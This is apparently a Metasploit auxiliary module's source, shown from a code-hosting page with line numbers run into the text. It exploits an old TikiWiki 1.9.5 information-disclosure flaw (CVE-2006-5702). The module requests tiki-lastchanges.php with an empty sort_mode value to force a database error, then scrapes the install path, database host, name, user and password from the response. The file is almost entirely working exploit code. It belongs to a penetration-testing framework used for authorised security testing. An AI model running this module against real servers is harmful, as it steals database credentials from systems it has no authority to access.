Path: blob/master/modules/auxiliary/admin/tikiwiki/tikidblib.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient78def initialize(info = {})9super(10update_info(11info,12'Name' => 'TikiWiki Information Disclosure',13'Description' => %q{14A vulnerability has been reported in Tikiwiki, which can be exploited by15an anonymous user to dump the MySQL user & passwd just by creating a mysql16error with the "sort_mode" var.1718The vulnerability was reported in Tikiwiki version 1.9.5.19},20'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],21'License' => MSF_LICENSE,22'References' => [23['OSVDB', '30172'],24['BID', '20858'],25['CVE', '2006-5702'],26['URL', 'https://web.archive.org/web/20080211225557/http://secunia.com/advisories/22678/'],27],28'DisclosureDate' => '2006-11-01',29'Actions' => [30['Dump', { 'Description' => 'Dump user and password' }]31],32'DefaultAction' => 'Dump',33'Notes' => {34'Stability' => [CRASH_SAFE],35'SideEffects' => [],36'Reliability' => []37}38)39)4041register_options(42[43OptString.new('URI', [true, 'TikiWiki directory path', '/tikiwiki']),44]45)46end4748def run49print_status('Establishing a connection to the target...')5051uri = normalize_uri(datastore['URI'], '/tiki-lastchanges.php')52rpath = uri + '?days=1&offset=0&sort_mode='5354res = send_request_raw({55'uri' => rpath,56'method' => 'GET',57'headers' =>58{59'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',60'Connection' => 'Close'61}62}, 25)6364if res && (res.message == 'OK')65print_status('Get information about database...')6667n = 068c = 06970# puts "body is #{res.body.length} bytes"71infos = res.body.split(/\r?\n/)72infos.each do |row|73# puts row.inspect74next unless (c < 6)7576if row.match(/\["file"\]=>/)77c += 178x = n + 179y = infos[x].match(/string\(\d+\) "(.*)"/m)80print_status("Install path : #{y[1]}")81end82if row.match(/\["databaseType"\]=>/)83c += 184x = n + 185y = infos[x].match(/string\(\d+\) "(.*)"/m)86print_status("DB type : #{y[1]}")87end88if row.match(/\["database"\]=>/)89c += 190x = n + 191y = infos[x].match(/string\(\d+\) "(.*)"/m)92print_status("DB name : #{y[1]}")93end94if row.match(/\["host"\]=>/)95c += 196x = n + 197y = infos[x].match(/string\(\d+\) "(.*)"/m)98print_status("DB host : #{y[1]}")99end100if row.match(/\["user"\]=>/)101c += 1102x = n + 1103y = infos[x].match(/string\(\d+\) "(.*)"/m)104print_status("DB user : #{y[1]}")105end106if row.match(/\["password"\]=>/)107c += 1108x = n + 1109y = infos[x].match(/string\(\d+\) "(.*)"/m)110print_status("DB password : #{y[1]}")111end112n += 1113end114115if (c == 0)116print_status('Could not obtain information about database.')117end118119else120print_status('No response from the server.')121end122end123end124125126